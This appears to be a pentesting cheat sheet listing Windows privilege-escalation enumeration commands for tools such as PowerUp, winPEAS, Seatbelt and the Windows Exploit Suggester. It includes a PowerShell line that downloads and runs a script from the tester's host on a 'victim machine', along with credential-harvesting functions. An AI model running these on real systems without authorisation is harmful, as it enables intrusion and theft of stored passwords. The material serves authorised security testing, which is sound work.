Enumeration Scripts
Last updated
Last updated
PowerUp
powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"
Get-GPPPassword
Get-UnattendedInstallFile
Get-Webconfig
Get-ApplicationHost
Get-SiteListPassword
Get-CachedGPPPassword
Get-RegistryAutoLogon
With PowerUp.ps1 we can donwload and run the script with one step, first we need to add this lines at the end of the code:
Then we start a python server in our machine and run the following command in the victim machine:
powershell IEX(New-Object Net.WebClient).downloadString('http://{My_IP}:{PORT}/PowerUp.ps1')
SharpUp
execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit UnquotedServicePath
execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit ModifiableServices
winPEAS.exe
windows-privesc-check2.exe
Seatbelt.exe -group=all
Seatbelt.exe -group=all -full
Seatbelt.exe -group=system -outputfile="C:\Temp\system.txt"
Seatbelt.exe -group=remote -computername=dc.theshire.local -computername=192.168.230.209 -username=THESHIRE\sam -password="yum \"po-ta-toes\""
Powerless.bat
winPEAS.bat
Windows Exploit Suggester
systeminfo > systeminfo.txt
python windows-exploit-suggester.py --update
python windows-exploit-suggester.py --database <DATE>-mssb.xlsx --systeminfo systeminfo.txt
wes.py (Windows Exploit Suggester next gen)
systeminfo > systeminfo.txt
wmic qfe > qfe.txt
python wes.py -u
python wes.py systeminfo.txt qfe.txt
WESNG (Windows Exploit Suggester Next Generation)
First obtain systeminfo
systeminfo
systeminfo > systeminfo.txt
Then feed it to wesng
python3 wes.py --update-wes
python3 wes.py --update
python3 wes.py systeminfo.txt
Sherlock (Deprecated)
powershell -exec bypass -command "& { Import-Module .\Sherlock.ps1; Find-AllVulns; }"
Watson (Implementation of Sherlock)
JAWS - Just Another Windows (Enum) Script
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt